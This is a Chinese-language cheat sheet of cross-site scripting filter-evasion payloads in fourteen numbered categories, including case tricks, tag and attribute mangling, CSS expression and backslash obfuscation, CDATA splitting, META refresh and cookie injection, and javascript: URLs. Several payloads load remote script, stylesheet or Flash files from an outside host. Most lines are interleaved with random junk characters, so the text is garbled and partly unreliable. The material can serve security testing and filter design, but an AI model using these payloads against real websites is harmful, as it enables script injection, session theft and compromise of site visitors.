1. 改变字符大小写" f; W/ g: k" {! A* [) O
- i9 l& f) n# n) F
0 t/ e8 e% G! T/ G+ t4 m% a
3 N% O1 r s6 X% q: h# d <sCript>alert(‘d’)</scRipT> ?$ ~$ O6 `' F" m, s! X
0 n7 u. }5 w i3 U G2. 利用多加一些其它字符来规避Regular Expression的检查) T9 |: l4 S* x) g& T0 N6 w' u
2 \1 _! a* S7 h7 ?: {# I: Z& b3 p <<script>alert(‘c’)//<</script>* H Q* t( i/ i9 H: H& C* E! c
* E3 i. }. ^; t; |% U% Z) [# R
<SCRIPT a=">" SRC="t.js"></SCRIPT>
2 b e3 P5 k7 G" h" U9 G# j7 k5 v5 M
<SCRIPT =">" SRC="t.js"></SCRIPT>
" t$ l6 j0 \, n8 ~% ^
1 W* ^. i% v2 b( Y, l9 A; ^! ~% `: v1 E <SCRIPT a=">" ” SRC="t.js"></SCRIPT>
1 N+ {7 k9 M( @2 E, ], h- Q- J0 t" `. ^) P8 F. B! O$ G W% K
<SCRIPT "a=’>’" SRC="t.js"></SCRIPT>9 l0 t, @, X5 \' Z
7 r" c. l1 m4 W( w4 U$ i8 j/ S: `
<SCRIPT a=`>` SRC="t.js"></SCRIPT>3 z! V- W+ V0 p
: @7 s" C5 I) ` <SCRIPT a=">’>" SRC="t.js"></SCRIPT>
6 e0 Y4 M) V8 l- ^- ^. {( B0 j) [2 y" k1 M: F$ j
3. 以其它扩展名取代.js
: e1 e" F+ ^/ Q8 M
/ T* S5 ?/ v6 k X <script src="bad.jpg"></script>; L9 M9 H+ G0 F9 y- q5 O0 ]) n
" m7 o1 n5 f! C/ b% L4 A4. 将Javascript写在CSS档里
8 V1 Y* I% E+ r4 E6 P1 w8 j
' O1 ?6 r( t7 V1 K4 ? <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
% i. d7 `6 o5 \) E3 \" L: L( K `7 y% H4 ] D1 m
example:" c5 [8 M- R+ u* u& F9 ~
! A' v% L3 y- c" `$ C body {; Y* r1 u) _5 o- G
; k6 ? O# V* s4 Y6 F background-image: url(‘javascript:alert("XSS");’)
4 T9 S; Z) I) I/ R+ q" u
9 v( H: ? r& Y* ^. p& v/ s1 v- l; ^ }# } E# {% p1 \ ^9 O4 l3 [
) x* I9 s+ |2 A3 l' T1 h" n
5. 在script的tag里加入一些其它字符* ~6 k& O" I% ^+ N% y0 w
2 o/ a; @$ `- d h$ Y$ m. ` <SCRIPT/SRC="t.js"></SCRIPT>
2 T4 R5 H( `! `- Y$ R1 h
9 t# ]( ~; {8 u <SCRIPT/anyword SRC="t.js"></SCRIPT>
& z1 K" q$ |7 @6 f G& s
+ F. ]- G- m7 J: K( q# X) J' w6. 使用tab或是new line来规避
- x( {; Y2 L3 r5 I- f" A
' ?, `+ }) I# l( G+ t& Z N <img src="jav ascr ipt:alert(‘XSS3′)">% H$ b6 }, q" [( b) y
' e) h# A; u! o# ]
<img src="jav ascr ipt:alert(‘XSS3′)">4 X! k1 M) k; o! y- a. K6 S/ m% n
" a. `) g9 k7 ~1 a8 z <IMG SRC="jav ascript:alert(‘XSS’);">
0 h. P: n0 {* W/ e" }* H
" {9 |% ?! C9 q- @; P7 \ -> tag
5 z+ X ^) i: c- \! [
9 Z% c" N6 L: m# y' c) f -> new line
% v2 |/ N8 l3 p( s6 Q
: ?# v& s9 |2 ?( c' D9 h7. 使用"\"来规避
8 q- _ e1 \1 y* A5 w3 Y9 R; Q2 }6 R! h8 U
<STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>; q% {) Y0 A' v# s; O: ~6 X
! D) {+ d, T) J) A <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
P8 k: A# a1 D& o, M; t$ F% P. ?# g$ Q. i# e2 y) ^! c
<IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
7 }8 s$ K) U. ~) }; E2 x# I4 e% r8 I; x/ e$ @' x
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
8 R2 E% d8 r8 j2 x( _3 L+ f z3 A$ o6 E. V# h9 u/ w' I
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>. y( P# ?/ \" Q
9 G% |- }3 C9 [& r; J8. 使用Hex encode来规避(也可能会把";"拿掉)
/ U0 }8 x& |% K: H- z+ I& [ M7 l7 t& Z" J/ b; {
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">+ ?; G, ^/ \% d/ w+ ]. k7 b
3 p& g$ Q) |' u; A 原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
- V1 p/ V( `( D/ z% {
& d2 i9 E( T0 X3 r) m2 X <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">5 r9 r4 C7 ^+ S2 h1 W* J$ Q
D8 F" g/ w+ r5 E+ G9 t; u
原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">. {3 ~/ l/ r. N
; f. Q. e# @* o
9. script in HTML tag
9 d t% n7 ]# x% z# M4 W9 m. Q+ u" ?+ u5 n, Q5 h z$ V7 U
<body onload=」alert(‘onload’)」>" n6 [# l$ e/ X: g
* K" g* l' q, H4 e+ l% Q) Z4 P onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
& P) N0 r2 a6 C0 N7 ^3 l" i/ u/ y+ M1 V8 {' p; |
10. 在swf里含有xss的code. H6 l! s& L3 ]$ R
$ Y% Q4 k5 E- B- M8 }8 Y- p <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>. F& L% I+ @' z1 p
1 q& S; R- s( O11. 利用CDATA将xss的code拆开,再组合起来。
) g/ }$ D9 ~5 v% U* M
1 p0 T7 c2 X3 k* _. q <XML ID=I><X><C>) V. p n/ s* @+ c
" J* S4 Y% T8 O1 j$ O <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
$ q f1 r1 {; p6 K3 m% e5 ?0 `2 z! }: V% b, m. V- ~3 O7 P
</C></X>
! ?4 S Q4 d% R }3 Y% a& s5 [3 |, L
/ Q/ H9 S/ H- J0 f# X9 H </xml>
% @7 J h/ G; A/ R9 t3 B' P3 n1 g! A
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> R) [5 |' o1 _
- x; h; g1 N% D
<XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
1 C& Z2 ]4 Z5 m5 g0 m: P- T. L
5 Q7 Y- j0 i6 x5 t+ k <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
O. S7 a) w6 ?9 `8 F N% S/ S# X+ S! c9 z+ M
12. 利用HTML+TIME。
$ {& I8 t' E. t; J
. l- w& u8 e: e4 r: G. p, u9 w% w <HTML><BODY>
! V0 S* P' b0 K3 R8 Y$ C6 T4 d" s, C9 W6 V% q
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">3 y' H- V: {7 d q' V
7 k$ e" b% I" a% x* ^ k# n
<?import namespace="t" implementation="#default#time2">
: M( v; i5 e3 C9 \5 ^8 [. H$ ?% `, E5 b* C
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">" u. M. d; n0 z& _: f
9 A4 U x$ b7 c/ J5 q! f/ ~
</BODY></HTML>5 K# \. i/ }+ ^; L4 u
1 \7 G, C7 O4 B8 t y. g" Q$ F13. 透过META写入Cookie。
# z8 _" n$ Y6 ?! p5 }6 b
$ _7 p7 V& `# | <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">1 ~; U: d* ~4 _) Z0 _
" f5 d) d, k8 T1 J9 K$ J6 B14. javascript in src , href , url
1 N. B2 k, l- X7 K4 W, J# q% x! s$ @
2 U2 u; q4 ?" P6 Z$ i <IFRAME SRC=javascript:alert(’13′)></IFRAME>
# P* a7 V x$ T
) `3 X: a" d& K, F; I9 d- C <img src="javascript:alert(‘XSS3′)"># Q1 g# A2 T3 F8 v. L3 _7 ]% n
8 U5 Z0 A* R2 b+ S1 [
<IMG DYNSRC="javascript:alert(‘XSS20′)">$ q- I7 }6 D |7 U; `. Y& R
# H% X) @ D* E5 k( o
<IMG LOWSRC="javascript:alert(‘XSS21′)">
- N) Z. V$ N6 q# @, b& {5 u; P) |1 K( t! o$ x4 I
<LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
$ n9 }" z* s! g8 d0 p$ p4 o; L4 g. ]; t+ v0 R% I) ^
<IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>* H0 ]! C6 `/ X: n; [+ ^) u
7 z/ X/ o' c1 U: T& _ <TABLE BACKGROUND="javascript:alert(‘XSS29′)">6 D$ _* f8 q1 S& _# Y# s+ ?* l% _
0 M# S4 I( u! A <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
3 E" T. e5 |$ y* O& e1 B4 u+ }; m# d) ~6 s
<STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}! k0 K9 A* f- F: M4 f6 e
9 A4 Y6 t4 R- w0 C+ E/ v4 N* W </STYLE><A CLASS=XSS></A>3 T5 `5 m4 Z0 F9 J, ?
; v1 R3 s$ w( W% L# I- C1 M) `0 I" P <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
; R! t+ `* W* f) x, b$ d8 ]* W. z6 t( e# R% |2 L; ]' B
|